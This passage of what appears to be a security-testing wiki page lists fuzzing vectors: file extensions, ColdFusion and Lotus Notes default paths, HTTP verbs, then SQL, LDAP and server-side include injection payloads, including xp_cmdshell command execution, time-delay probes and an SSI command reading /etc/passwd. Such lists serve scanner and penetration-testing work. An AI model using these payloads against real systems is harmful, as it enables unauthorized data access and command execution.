.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
